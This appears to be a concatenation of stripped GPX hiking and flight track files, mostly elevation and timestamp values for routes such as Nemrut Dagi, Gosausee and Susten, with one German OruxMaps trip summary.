+
+Waypoint
+
+
+
+
+1440.64453125
+2015-08-03T20:23:50Z
+Theodor-Körner-Hütte(1466m)
+Theodor-Körner-Hütte(1466m)
+Theodor-Körner-Hütte(1466m)
+
+Waypoint
+
+
+
+
+927.23828125
+2015-08-03T20:23:23Z
+Gasthof Gosausee
+Gasthof Gosausee
+Gasthof Gosausee
+
+Waypoint
+
+
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2016-07-18T21:28:10Z
+
+GPSies Track on GPSies.com
+
+
+
+622.0
+2010-01-01T00:00:00Z
+
+
+620.0
+2010-01-01T00:00:31Z
+
+
+641.0
+2010-01-01T00:01:16Z
+
+
+634.0
+2010-01-01T00:01:27Z
+
+
+636.0
+2010-01-01T00:02:09Z
+
+
+648.0
+2010-01-01T00:02:52Z
+
+
+652.0
+2010-01-01T00:03:12Z
+
+
+687.0
+2010-01-01T00:04:09Z
+
+
+709.0
+2010-01-01T00:04:39Z
+
+
+717.0
+2010-01-01T00:05:10Z
+
+
+725.0
+2010-01-01T00:05:26Z
+
+
+737.0
+2010-01-01T00:06:09Z
+
+
+752.0
+2010-01-01T00:06:31Z
+
+
+778.0
+2010-01-01T00:07:31Z
+
+
+781.0
+2010-01-01T00:08:08Z
+
+
+791.0
+2010-01-01T00:08:54Z
+
+
+793.0
+2010-01-01T00:09:12Z
+
+
+813.0
+2010-01-01T00:09:42Z
+
+
+839.0
+2010-01-01T00:10:34Z
+
+
+867.0
+2010-01-01T00:11:23Z
+
+
+910.0
+2010-01-01T00:12:57Z
+
+
+944.0
+2010-01-01T00:14:04Z
+
+
+971.0
+2010-01-01T00:15:27Z
+
+
+984.0
+2010-01-01T00:16:11Z
+
+
+992.0
+2010-01-01T00:17:13Z
+
+
+1024.0
+2010-01-01T00:18:04Z
+
+
+1043.0
+2010-01-01T00:18:43Z
+
+
+1040.0
+2010-01-01T00:19:13Z
+
+
+1071.0
+2010-01-01T00:20:21Z
+
+
+1094.0
+2010-01-01T00:21:25Z
+
+
+1105.0
+2010-01-01T00:22:09Z
+
+
+1153.0
+2010-01-01T00:24:15Z
+
+
+1165.0
+2010-01-01T00:25:27Z
+
+
+1175.0
+2010-01-01T00:25:43Z
+
+
+1187.0
+2010-01-01T00:26:02Z
+
+
+1200.0
+2010-01-01T00:26:30Z
+
+
+1212.0
+2010-01-01T00:26:43Z
+
+
+1219.0
+2010-01-01T00:26:56Z
+
+
+1243.0
+2010-01-01T00:27:38Z
+
+
+1265.0
+2010-01-01T00:28:20Z
+
+
+1279.0
+2010-01-01T00:29:13Z
+
+
+1304.0
+2010-01-01T00:29:43Z
+
+
+1316.0
+2010-01-01T00:30:20Z
+
+
+1342.0
+2010-01-01T00:31:05Z
+
+
+1352.0
+2010-01-01T00:31:52Z
+
+
+1367.0
+2010-01-01T00:32:20Z
+
+
+1364.0
+2010-01-01T00:32:55Z
+
+
+1370.0
+2010-01-01T00:33:29Z
+
+
+1401.0
+2010-01-01T00:35:27Z
+
+
+1405.0
+2010-01-01T00:35:46Z
+
+
+1452.0
+2010-01-01T00:36:39Z
+
+
+1464.0
+2010-01-01T00:37:08Z
+
+
+1510.0
+2010-01-01T00:37:58Z
+
+
+1540.0
+2010-01-01T00:38:17Z
+
+
+1561.0
+2010-01-01T00:38:28Z
+
+
+1616.0
+2010-01-01T00:39:07Z
+
+
+1615.0
+2010-01-01T00:39:54Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2014-09-09T21:29:45Z
+
+GPSies Track on GPSies.com
+
+
+1360.0
+2010-01-01T00:00:00Z
+
+
+1372.0
+2010-01-01T00:00:45Z
+
+
+1391.0
+2010-01-01T00:01:19Z
+
+
+1422.0
+2010-01-01T00:01:53Z
+
+
+1482.0
+2010-01-01T00:02:41Z
+
+
+1493.0
+2010-01-01T00:02:50Z
+
+
+1506.0
+2010-01-01T00:03:06Z
+
+
+1517.0
+2010-01-01T00:03:17Z
+
+
+1520.0
+2010-01-01T00:03:33Z
+
+
+1542.0
+2010-01-01T00:04:06Z
+
+
+1559.0
+2010-01-01T00:04:26Z
+
+
+1567.0
+2010-01-01T00:04:36Z
+
+
+1580.0
+2010-01-01T00:04:57Z
+
+
+1606.0
+2010-01-01T00:05:18Z
+
+
+1711.0
+2010-01-01T00:06:38Z
+
+
+1716.0
+2010-01-01T00:06:52Z
+
+
+1733.0
+2010-01-01T00:07:10Z
+
+
+1777.0
+2010-01-01T00:07:49Z
+
+
+1787.0
+2010-01-01T00:08:32Z
+
+
+1792.0
+2010-01-01T00:09:01Z
+
+
+1803.0
+2010-01-01T00:09:51Z
+
+
+1823.0
+2010-01-01T00:10:55Z
+
+
+1828.0
+2010-01-01T00:11:47Z
+
+
+1870.0
+2010-01-01T00:12:49Z
+
+
+1890.0
+2010-01-01T00:13:42Z
+
+
+1907.0
+2010-01-01T00:14:15Z
+
+
+1947.0
+2010-01-01T00:15:00Z
+
+
+1999.0
+2010-01-01T00:15:51Z
+
+
+2041.0
+2010-01-01T00:16:44Z
+
+
+2068.0
+2010-01-01T00:17:24Z
+
+
+2092.0
+2010-01-01T00:18:12Z
+
+
+2159.0
+2010-01-01T00:18:53Z
+
+
+2205.0
+2010-01-01T00:19:11Z
+
+
+2213.0
+2010-01-01T00:19:35Z
+
+
+2248.0
+2010-01-01T00:20:13Z
+
+
+2249.0
+2010-01-01T00:20:46Z
+
+
+2250.0
+2010-01-01T00:21:22Z
+
+
+2299.0
+2010-01-01T00:22:17Z
+
+
+2282.0
+2010-01-01T00:23:15Z
+
+
+2328.0
+2010-01-01T00:24:04Z
+
+
+2282.0
+2010-01-01T00:24:52Z
+
+
+2302.0
+2010-01-01T00:25:51Z
+
+
+2247.0
+2010-01-01T00:26:48Z
+
+
+2249.0
+2010-01-01T00:27:22Z
+
+
+2248.0
+2010-01-01T00:27:54Z
+
+
+2214.0
+2010-01-01T00:28:32Z
+
+
+2208.0
+2010-01-01T00:28:54Z
+
+
+2160.0
+2010-01-01T00:29:11Z
+
+
+2192.0
+2010-01-01T00:29:36Z
+
+
+2184.0
+2010-01-01T00:29:53Z
+
+
+2145.0
+2010-01-01T00:30:19Z
+
+
+2138.0
+2010-01-01T00:30:44Z
+
+
+2144.0
+2010-01-01T00:31:17Z
+
+
+2170.0
+2010-01-01T00:31:45Z
+
+
+2190.0
+2010-01-01T00:32:11Z
+
+
+2178.0
+2010-01-01T00:32:33Z
+
+
+2159.0
+2010-01-01T00:32:51Z
+
+
+2129.0
+2010-01-01T00:33:20Z
+
+
+2090.0
+2010-01-01T00:34:07Z
+
+
+2095.0
+2010-01-01T00:34:45Z
+
+
+2121.0
+2010-01-01T00:35:39Z
+
+
+2112.0
+2010-01-01T00:36:16Z
+
+
+2078.0
+2010-01-01T00:37:00Z
+
+
+2011.0
+2010-01-01T00:37:45Z
+
+
+1967.0
+2010-01-01T00:38:39Z
+
+
+1945.0
+2010-01-01T00:39:08Z
+
+
+1931.0
+2010-01-01T00:40:02Z
+
+
+1916.0
+2010-01-01T00:41:04Z
+
+
+1904.0
+2010-01-01T00:41:56Z
+
+
+1898.0
+2010-01-01T00:42:28Z
+
+
+1902.0
+2010-01-01T00:42:59Z
+
+
+1896.0
+2010-01-01T00:43:31Z
+
+
+1900.0
+2010-01-01T00:44:09Z
+
+
+1904.0
+2010-01-01T00:44:46Z
+
+
+1914.0
+2010-01-01T00:45:25Z
+
+
+1908.0
+2010-01-01T00:45:41Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-04-03T12:56:50Z
+
+03-APR-16 14:56:47
+
+
+
+
+
+396.2
+2016-04-03T08:10:03Z
+
+
+403.41
+2016-04-03T08:11:24Z
+
+
+407.26
+2016-04-03T08:13:14Z
+
+
+409.66
+2016-04-03T08:14:36Z
+
+
+430.81
+2016-04-03T08:26:04Z
+
+
+435.61
+2016-04-03T08:30:21Z
+
+
+438.02
+2016-04-03T08:33:20Z
+
+
+435.61
+2016-04-03T08:34:42Z
+
+
+436.1
+2016-04-03T08:36:16Z
+
+
+443.79
+2016-04-03T08:37:56Z
+
+
+404.85
+2016-04-03T09:03:11Z
+
+
+405.81
+2016-04-03T09:08:41Z
+
+
+403.41
+2016-04-03T09:09:58Z
+
+
+400.05
+2016-04-03T09:11:28Z
+
+
+410.62
+2016-04-03T09:17:27Z
+
+
+412.06
+2016-04-03T09:22:08Z
+
+
+415.43
+2016-04-03T09:23:49Z
+
+
+410.62
+2016-04-03T09:27:40Z
+
+
+414.47
+2016-04-03T09:39:13Z
+
+
+415.43
+2016-04-03T09:42:36Z
+
+
+413.98
+2016-04-03T09:44:07Z
+
+
+414.47
+2016-04-03T09:47:51Z
+
+
+415.43
+2016-04-03T09:51:07Z
+
+
+420.71
+2016-04-03T09:52:52Z
+
+
+423.6
+2016-04-03T09:54:23Z
+
+
+429.37
+2016-04-03T09:56:04Z
+
+
+441.38
+2016-04-03T09:57:58Z
+
+
+461.09
+2016-04-03T10:00:18Z
+
+
+489.45
+2016-04-03T10:04:15Z
+
+
+544.24
+2016-04-03T10:10:50Z
+
+
+549.53
+2016-04-03T10:14:01Z
+
+
+550.97
+2016-04-03T10:16:11Z
+
+
+552.41
+2016-04-03T10:18:36Z
+
+
+553.38
+2016-04-03T10:24:11Z
+
+
+563.47
+2016-04-03T10:26:02Z
+
+
+572.12
+2016-04-03T10:27:34Z
+
+
+542.8
+2016-04-03T10:35:01Z
+
+
+531.27
+2016-04-03T10:37:14Z
+
+
+500.02
+2016-04-03T10:39:27Z
+
+
+476.95
+2016-04-03T10:43:10Z
+
+
+467.34
+2016-04-03T10:44:56Z
+
+
+462.05
+2016-04-03T10:46:38Z
+
+
+459.17
+2016-04-03T10:48:03Z
+
+
+446.19
+2016-04-03T10:49:20Z
+
+
+436.58
+2016-04-03T10:57:26Z
+
+
+428.89
+2016-04-03T10:58:42Z
+
+
+419.75
+2016-04-03T11:01:38Z
+
+
+418.79
+2016-04-03T11:04:09Z
+
+
+418.79
+2016-04-03T11:10:44Z
+
+
+417.83
+2016-04-03T11:14:33Z
+
+
+411.1
+2016-04-03T11:22:39Z
+
+
+412.54
+2016-04-03T11:23:53Z
+
+
+412.06
+2016-04-03T11:26:33Z
+
+
+408.7
+2016-04-03T11:29:36Z
+
+
+407.74
+2016-04-03T11:33:55Z
+
+
+405.81
+2016-04-03T11:38:28Z
+
+
+406.29
+2016-04-03T11:41:31Z
+
+
+409.18
+2016-04-03T11:43:05Z
+
+
+406.29
+2016-04-03T11:44:49Z
+
+
+404.85
+2016-04-03T11:46:10Z
+
+
+404.37
+2016-04-03T11:47:36Z
+
+
+403.89
+2016-04-03T11:49:40Z
+
+
+414.47
+2016-04-03T12:43:33Z
+
+
+414.95
+2016-04-03T12:45:45Z
+
+
+413.5
+2016-04-03T12:48:14Z
+
+
+416.87
+2016-04-03T12:49:44Z
+
+
+414.47
+2016-04-03T12:51:12Z
+
+
+422.16
+2016-04-03T12:52:56Z
+
+
+424.56
+2016-04-03T12:54:20Z
+
+
+425.52
+2016-04-03T12:55:50Z
+ "
+"
+
+
+Carl Hirnbein Weg
+
+Andreas Kögel - Community
+
+
+
+2016-05-03T09:39:21Z
+
+Carl Hirnbein Weg
+
+
+
+894.4
+
+
+917.7
+
+
+922.4
+
+
+927.3
+
+
+909.5
+
+
+898.7
+
+
+900.2
+
+
+902.2
+
+
+907.7
+
+
+909.4
+
+
+918.6
+
+
+932.6
+
+
+934.0
+
+
+936.9
+
+
+949.3
+
+
+954.1
+
+
+956.4
+
+
+965.7
+
+
+962.5
+
+
+956.8
+
+
+957.1
+
+
+937.8
+
+
+940.5
+
+
+947.2
+
+
+957.2
+
+
+955.6
+
+
+957.0
+
+
+957.2
+
+
+953.9
+
+
+936.8
+
+
+900.0
+
+
+889.6
+
+
+886.8
+
+
+880.3
+
+
+870.2
+
+
+860.3
+
+
+836.1
+
+
+829.3
+
+
+826.4
+
+
+824.2
+
+
+827.2
+
+
+829.3
+
+
+842.9
+
+
+846.4
+
+
+848.8
+
+
+850.0
+
+
+849.2
+
+
+849.5
+
+
+855.33825
+
+
+852.47279
+
+
+849.63462
+
+
+871.15424
+
+
+861.3
+
+
+854.6
+
+
+856.0
+
+
+858.4
+
+
+860.8
+
+
+862.9
+
+
+872.3
+
+
+880.5
+
+
+877.9
+
+
+883.8
+
+
+892.5
+
+
+898.8
+
+
+898.7
+
+
+896.7
+
+
+898.7
+
+
+909.5
+
+
+927.3
+
+
+922.4
+
+
+917.7
+
+
+894.4
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2017-04-14T23:37:59Z
+
+GPSies Track on GPSies.com
+
+
+
+1032.0
+2010-01-01T00:00:00Z
+
+
+1041.0
+2010-01-01T00:00:19Z
+
+
+1045.0
+2010-01-01T00:00:39Z
+
+
+1055.0
+2010-01-01T00:01:04Z
+
+
+1060.0
+2010-01-01T00:01:19Z
+
+
+1071.0
+2010-01-01T00:02:04Z
+
+
+1079.0
+2010-01-01T00:02:19Z
+
+
+1094.0
+2010-01-01T00:03:01Z
+
+
+1098.0
+2010-01-01T00:03:11Z
+
+
+1099.0
+2010-01-01T00:03:34Z
+
+
+1120.0
+2010-01-01T00:04:18Z
+
+
+1146.0
+2010-01-01T00:04:59Z
+
+
+1163.0
+2010-01-01T00:05:50Z
+
+
+1176.0
+2010-01-01T00:06:42Z
+
+
+1193.0
+2010-01-01T00:07:18Z
+
+
+1207.0
+2010-01-01T00:08:28Z
+
+
+1225.0
+2010-01-01T00:08:49Z
+
+
+1229.0
+2010-01-01T00:08:54Z
+
+
+1239.0
+2010-01-01T00:09:21Z
+
+
+1237.0
+2010-01-01T00:09:37Z
+
+
+1237.0
+2010-01-01T00:10:10Z
+
+
+1257.0
+2010-01-01T00:10:54Z
+
+
+1289.0
+2010-01-01T00:11:33Z
+
+
+1295.0
+2010-01-01T00:11:54Z
+
+
+1289.0
+2010-01-01T00:12:14Z
+
+
+1299.0
+2010-01-01T00:12:40Z
+
+
+1305.0
+2010-01-01T00:12:57Z
+
+
+1340.0
+2010-01-01T00:13:29Z
+
+
+1320.0
+2010-01-01T00:13:57Z
+
+
+1342.0
+2010-01-01T00:14:17Z
+
+
+1367.0
+2010-01-01T00:15:34Z
+
+
+1385.0
+2010-01-01T00:15:55Z
+
+
+1388.0
+2010-01-01T00:16:54Z
+
+
+1412.0
+2010-01-01T00:17:39Z
+
+
+1411.0
+2010-01-01T00:18:22Z
+
+
+1413.0
+2010-01-01T00:18:32Z
+
+
+1423.0
+2010-01-01T00:18:42Z
+
+
+1432.0
+2010-01-01T00:19:24Z
+
+
+1444.0
+2010-01-01T00:20:09Z
+
+
+1453.0
+2010-01-01T00:20:57Z
+
+
+1445.0
+2010-01-01T00:21:19Z
+
+
+1467.0
+2010-01-01T00:21:56Z
+
+
+1462.0
+2010-01-01T00:22:14Z
+
+
+1462.0
+2010-01-01T00:22:47Z
+
+
+1469.0
+2010-01-01T00:23:08Z
+
+
+1480.0
+2010-01-01T00:23:34Z
+
+
+1493.0
+2010-01-01T00:24:02Z
+
+
+1497.0
+2010-01-01T00:24:21Z
+
+
+1508.0
+2010-01-01T00:24:36Z
+
+
+1507.0
+2010-01-01T00:25:30Z
+
+
+1503.0
+2010-01-01T00:26:02Z
+
+
+1494.0
+2010-01-01T00:27:10Z
+
+
+1529.0
+2010-01-01T00:28:44Z
+
+
+1538.0
+2010-01-01T00:28:53Z
+
+
+1538.0
+2010-01-01T00:29:01Z
+
+
+1546.0
+2010-01-01T00:29:48Z
+
+
+1534.0
+2010-01-01T00:30:32Z
+
+
+1483.0
+2010-01-01T00:31:05Z
+
+
+1512.0
+2010-01-01T00:31:38Z
+
+
+1524.0
+2010-01-01T00:32:02Z
+
+
+1496.0
+2010-01-01T00:33:48Z
+
+
+1522.0
+2010-01-01T00:34:21Z
+
+
+1491.0
+2010-01-01T00:34:44Z
+
+
+1489.0
+2010-01-01T00:35:15Z
+ "
+"
+
+
+
+
+
+
+GPS dump for www.flightlog.org
+2016-12-05T19:28:48Z
+
+
+Track 001
+
+
+
+1029.7
+2016-12-03T09:01:03Z
+
+
+1025.8
+2016-12-03T09:06:03Z
+
+
+1030.6
+2016-12-03T09:07:03Z
+
+
+1024.9
+2016-12-03T09:08:33Z
+
+
+1028.2
+2016-12-03T09:10:03Z
+
+
+1037.4
+2016-12-03T09:11:03Z
+
+
+1037.8
+2016-12-03T09:11:50Z
+
+
+1044.6
+2016-12-03T09:12:33Z
+
+
+1049.9
+2016-12-03T09:14:03Z
+
+
+1065.2
+2016-12-03T09:16:03Z
+
+
+1082.5
+2016-12-03T09:18:03Z
+
+
+1087.8
+2016-12-03T09:21:03Z
+
+
+1091.7
+2016-12-03T09:23:03Z
+
+
+1104.2
+2016-12-03T09:24:33Z
+
+
+1134.0
+2016-12-03T09:29:33Z
+
+
+1134.0
+2016-12-03T09:30:33Z
+
+
+1163.8
+2016-12-03T09:36:03Z
+
+
+1200.3
+2016-12-03T09:40:33Z
+
+
+1241.2
+2016-12-03T09:48:33Z
+
+
+1264.7
+2016-12-03T09:54:33Z
+
+
+1295.9
+2016-12-03T09:59:03Z
+
+
+1308.0
+2016-12-03T10:00:33Z
+
+
+1386.3
+2016-12-03T10:10:33Z
+
+
+1406.0
+2016-12-03T10:12:33Z
+
+
+1447.4
+2016-12-03T10:19:33Z
+
+
+1469.9
+2016-12-03T10:22:03Z
+
+
+1494.5
+2016-12-03T10:23:33Z
+
+
+1525.7
+2016-12-03T10:30:03Z
+
+
+1519.5
+2016-12-03T10:32:03Z
+
+
+1538.7
+2016-12-03T10:33:33Z
+
+
+1545.9
+2016-12-03T10:34:33Z
+
+
+1558.9
+2016-12-03T10:44:33Z
+
+
+1571.8
+2016-12-03T10:46:33Z
+
+
+1610.3
+2016-12-03T10:51:03Z
+
+
+1650.2
+2016-12-03T10:55:03Z
+
+
+1656.0
+2016-12-03T10:56:03Z
+
+
+1674.2
+2016-12-03T11:00:33Z
+
+
+1695.4
+2016-12-03T11:03:03Z
+
+
+1726.6
+2016-12-03T11:07:03Z
+
+
+1740.6
+2016-12-03T11:08:03Z
+
+
+1764.6
+2016-12-03T11:09:33Z
+
+
+1771.8
+2016-12-03T11:15:03Z
+
+
+1832.8
+2016-12-03T11:23:03Z
+
+
+1886.7
+2016-12-03T11:32:03Z
+
+
+1909.8
+2016-12-03T11:34:33Z
+
+
+1930.9
+2016-12-03T11:39:03Z
+
+
+2016.9
+2016-12-03T11:51:03Z
+
+
+2041.5
+2016-12-03T11:56:33Z
+
+
+2044.3
+2016-12-03T11:57:33Z
+
+
+2060.7
+2016-12-03T12:00:33Z
+
+
+2087.1
+2016-12-03T12:04:33Z
+
+
+2091.9
+2016-12-03T12:13:33Z
+
+
+2096.7
+2016-12-03T12:16:03Z
+
+
+2115.0
+2016-12-03T12:18:33Z
+
+
+2133.7
+2016-12-03T12:21:03Z
+
+
+2156.8
+2016-12-03T12:24:33Z
+
+
+2195.3
+2016-12-03T12:31:03Z
+
+
+2219.8
+2016-12-03T12:39:33Z
+ "
+"
+
+
+Nemrut Dagi
+
+
+
+
+
+OruxMaps
+2017-09-18T07:30:53Z
+
+
+Nemrut Dagi
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Nemrut Dagi</h2><br /><p>Startzeit: 09/18/2017 10:30</p><p>Zielzeit: 09/18/2017 12:08</p><p>Strecke: 4,3km (01:37)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 2,7km/h</p><p>Netto-Geschwindigkeit: 3,6km/h</p><p>Max. Geschwindigkeit: 7,2km/h</p><p>Minimale Höhe: 2427m</p><p>Maximale Höhe: 2939m</p><p>Steig-Geschw.: 418,3m/h</p><p>Sink-Geschw.: -689,3m/h</p><p>Aufstieg: 575m</p><p>Abstieg: -78m</p><p>Steigzeit: 01:22</p><p>Sinkzeit: 00:06</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2433.63
+2017-09-18T07:30:54Z
+
+
+2431.63
+2017-09-18T07:31:46Z
+
+
+2428.14
+2017-09-18T07:32:19Z
+
+
+2451.05
+2017-09-18T07:35:27Z
+
+
+2448.26
+2017-09-18T07:36:07Z
+
+
+2464.85
+2017-09-18T07:38:45Z
+
+
+2471.63
+2017-09-18T07:40:37Z
+
+
+2472.63
+2017-09-18T07:41:13Z
+
+
+2474.03
+2017-09-18T07:42:38Z
+
+
+2470.55
+2017-09-18T07:45:58Z
+
+
+2488.62
+2017-09-18T07:48:00Z
+
+
+2485.76
+2017-09-18T07:48:16Z
+
+
+2486.69
+2017-09-18T07:49:50Z
+
+
+2501.13
+2017-09-18T07:52:18Z
+
+
+2536.73
+2017-09-18T07:57:06Z
+
+
+2596.48
+2017-09-18T08:03:59Z
+
+
+2624.63
+2017-09-18T08:07:15Z
+
+
+2632.01
+2017-09-18T08:10:05Z
+
+
+2640.64
+2017-09-18T08:11:57Z
+
+
+2643.14
+2017-09-18T08:14:15Z
+
+
+2664.66
+2017-09-18T08:18:26Z
+
+
+2666.98
+2017-09-18T08:19:33Z
+
+
+2676.59
+2017-09-18T08:21:50Z
+
+
+2685.57
+2017-09-18T08:27:10Z
+
+
+2692.54
+2017-09-18T08:29:22Z
+
+
+2709.65
+2017-09-18T08:32:04Z
+
+
+2739.51
+2017-09-18T08:35:33Z
+
+
+2739.03
+2017-09-18T08:37:33Z
+
+
+2757.13
+2017-09-18T08:39:27Z
+
+
+2776.57
+2017-09-18T08:41:53Z
+
+
+2787.54
+2017-09-18T08:43:07Z
+
+
+2795.6
+2017-09-18T08:44:50Z
+
+
+2805.14
+2017-09-18T08:46:26Z
+
+
+2812.51
+2017-09-18T08:47:05Z
+
+
+2809.48
+2017-09-18T08:51:18Z
+
+
+2837.85
+2017-09-18T08:54:32Z
+
+
+2846.19
+2017-09-18T08:58:06Z
+
+
+2796.11
+2017-09-18T08:58:48Z
+
+
+2864.84
+2017-09-18T08:59:33Z
+
+
+2881.88
+2017-09-18T09:01:56Z
+
+
+2902.09
+2017-09-18T09:04:33Z
+
+
+2921.63
+2017-09-18T09:07:27Z
+
+
+2925.48
+2017-09-18T09:08:50Z
+ "
+"
+
+
+Tourenplanung am 22. Juli 2016
+
+TemporaryUserGroup
+
+
+
+2016-07-22T10:31:32Z
+
+Tourenplanung am 22. Juli 2016
+
+
+
+261.1
+
+
+262.2
+
+
+262.7
+
+
+265.0
+
+
+266.6
+
+
+268.2
+
+
+273.4
+
+
+276.6
+
+
+279.3
+
+
+282.2
+
+
+268.0
+
+
+268.6
+
+
+265.9
+
+
+276.3
+
+
+276.5
+
+
+279.4
+
+
+280.0
+
+
+283.8
+
+
+280.1
+
+
+285.3
+
+
+288.5
+
+
+291.1
+
+
+290.5
+
+
+293.8
+
+
+308.4
+
+
+307.2
+
+
+306.6
+
+
+314.9
+
+
+309.6
+
+
+298.0
+
+
+294.7
+
+
+281.4
+
+
+279.3
+
+
+276.6
+
+
+273.4
+
+
+268.2
+
+
+266.6
+
+
+265.0
+
+
+262.7
+
+
+262.2
+
+
+261.1
+ "
+"
+
+
+Obri Hrad
+
+dodovogel
+
+dodovogel on GPSies.com
+GPSiesUserOnWeb
+
+
+Obri Hrad on GPSies.com
+trackOnWeb
+2017-01-03T14:12:22Z
+
+round trip
+214.0
+4201.899631769187
+871.0
+1014.0
+215.0
+
+Obri Hrad on GPSies.com
+
+trackOnWeb
+
+
+872.0
+2010-01-01T00:00:00Z
+
+
+871.0
+2010-01-01T00:00:05Z
+
+
+883.0
+2010-01-01T00:00:52Z
+
+
+904.0
+2010-01-01T00:01:23Z
+
+
+921.0
+2010-01-01T00:01:36Z
+
+
+941.0
+2010-01-01T00:02:18Z
+
+
+958.0
+2010-01-01T00:02:36Z
+
+
+972.0
+2010-01-01T00:02:56Z
+
+
+983.0
+2010-01-01T00:03:29Z
+
+
+987.0
+2010-01-01T00:03:42Z
+
+
+989.0
+2010-01-01T00:03:52Z
+
+
+997.0
+2010-01-01T00:04:18Z
+
+
+1008.0
+2010-01-01T00:04:47Z
+
+
+1009.0
+2010-01-01T00:05:21Z
+
+
+1014.0
+2010-01-01T00:06:11Z
+
+
+1010.0
+2010-01-01T00:06:33Z
+
+
+1006.0
+2010-01-01T00:06:44Z
+
+
+975.0
+2010-01-01T00:07:49Z
+
+
+972.0
+2010-01-01T00:08:18Z
+
+
+968.0
+2010-01-01T00:08:37Z
+
+
+961.0
+2010-01-01T00:08:52Z
+
+
+959.0
+2010-01-01T00:09:14Z
+
+
+961.0
+2010-01-01T00:09:30Z
+
+
+963.0
+2010-01-01T00:09:36Z
+
+
+981.0
+2010-01-01T00:10:14Z
+
+
+996.0
+2010-01-01T00:10:48Z
+
+
+992.0
+2010-01-01T00:11:09Z
+
+
+996.0
+2010-01-01T00:11:30Z
+
+
+988.0
+2010-01-01T00:11:48Z
+
+
+985.0
+2010-01-01T00:11:59Z
+
+
+983.0
+2010-01-01T00:12:23Z
+
+
+982.0
+2010-01-01T00:12:49Z
+
+
+981.0
+2010-01-01T00:13:16Z
+
+
+981.0
+2010-01-01T00:13:27Z
+
+
+976.0
+2010-01-01T00:13:38Z
+
+
+982.0
+2010-01-01T00:13:49Z
+
+
+984.0
+2010-01-01T00:14:11Z
+
+
+984.0
+2010-01-01T00:14:25Z
+
+
+980.0
+2010-01-01T00:14:38Z
+
+
+976.0
+2010-01-01T00:14:47Z
+
+
+981.0
+2010-01-01T00:14:59Z
+
+
+980.0
+2010-01-01T00:15:08Z
+
+
+975.0
+2010-01-01T00:15:31Z
+
+
+972.0
+2010-01-01T00:15:54Z
+
+
+969.0
+2010-01-01T00:16:21Z
+
+
+955.0
+2010-01-01T00:16:41Z
+
+
+931.0
+2010-01-01T00:17:05Z
+
+
+939.0
+2010-01-01T00:17:16Z
+
+
+942.0
+2010-01-01T00:17:24Z
+
+
+969.0
+2010-01-01T00:17:59Z
+
+
+975.0
+2010-01-01T00:18:48Z
+
+
+980.0
+2010-01-01T00:19:12Z
+
+
+983.0
+2010-01-01T00:19:47Z
+
+
+985.0
+2010-01-01T00:20:10Z
+
+
+988.0
+2010-01-01T00:20:21Z
+
+
+996.0
+2010-01-01T00:20:39Z
+
+
+992.0
+2010-01-01T00:21:00Z
+
+
+966.0
+2010-01-01T00:21:41Z
+
+
+941.0
+2010-01-01T00:22:59Z
+
+
+921.0
+2010-01-01T00:23:40Z
+
+
+903.0
+2010-01-01T00:23:54Z
+
+
+883.0
+2010-01-01T00:24:24Z
+
+
+871.0
+2010-01-01T00:25:12Z
+ "
+"
+
+
+Tourenplanung am 19. Juli 2016
+
+TemporaryUserGroup
+
+
+
+2016-07-19T18:38:01Z
+
+Tourenplanung am 19. Juli 2016
+
+
+
+275.89325
+
+
+274.00907
+
+
+273.30034
+
+
+273.91532
+
+
+273.51162
+
+
+274.47306
+
+
+273.74806
+
+
+272.20395
+
+
+268.77886
+
+
+266.78968
+
+
+266.04337
+
+
+261.41767
+
+
+258.31382
+
+
+261.17962
+
+
+263.43049
+
+
+261.34292
+
+
+262.14787
+
+
+259.07485
+
+
+265.41571
+
+
+261.96979
+
+
+265.16687
+
+
+261.93601
+
+
+261.00921
+
+
+264.86304
+
+
+260.60539
+
+
+253.97716
+
+
+257.71395
+
+
+259.26019
+
+
+262.04642
+
+
+265.1275
+
+
+268.10227
+
+
+271.36584
+
+
+274.20589
+
+
+272.80127
+
+
+276.34288
+
+
+272.64178
+
+
+273.71022
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-01T06:48:29Z
+
+
+susten
+
+
+
+
+
+
+1524.04
+2015-06-30T08:12:17Z
+
+
+1524.38
+2015-06-30T08:13:28Z
+
+
+1526.03
+2015-06-30T08:14:23Z
+
+
+1527.04
+2015-06-30T08:14:39Z
+
+
+1546.25
+2015-06-30T08:16:39Z
+
+
+1557.01
+2015-06-30T08:18:20Z
+
+
+1570.52
+2015-06-30T08:20:15Z
+
+
+1577.94
+2015-06-30T08:21:45Z
+
+
+1604.29
+2015-06-30T08:26:41Z
+
+
+1622.4
+2015-06-30T08:28:47Z
+
+
+1626.01
+2015-06-30T08:30:02Z
+
+
+1648.99
+2015-06-30T08:33:41Z
+
+
+1657.64
+2015-06-30T08:35:01Z
+
+
+1700.26
+2015-06-30T08:40:43Z
+
+
+1713.34
+2015-06-30T08:43:28Z
+
+
+1734.89
+2015-06-30T08:47:40Z
+
+
+1751.44
+2015-06-30T08:50:53Z
+
+
+1801.61
+2015-06-30T09:05:09Z
+
+
+1833.44
+2015-06-30T09:11:25Z
+
+
+1841.77
+2015-06-30T09:13:46Z
+
+
+1845.28
+2015-06-30T09:19:55Z
+
+
+1844.96
+2015-06-30T09:21:30Z
+
+
+1841.66
+2015-06-30T09:22:44Z
+
+
+1854.24
+2015-06-30T09:24:10Z
+
+
+1860.35
+2015-06-30T09:24:35Z
+
+
+1867.25
+2015-06-30T09:25:05Z
+
+
+1878.42
+2015-06-30T09:25:50Z
+
+
+1895.31
+2015-06-30T09:27:07Z
+
+
+1897.01
+2015-06-30T09:28:19Z
+
+
+1944.24
+2015-06-30T09:32:21Z
+
+
+2004.14
+2015-06-30T09:37:28Z
+
+
+2024.3
+2015-06-30T09:39:22Z
+
+
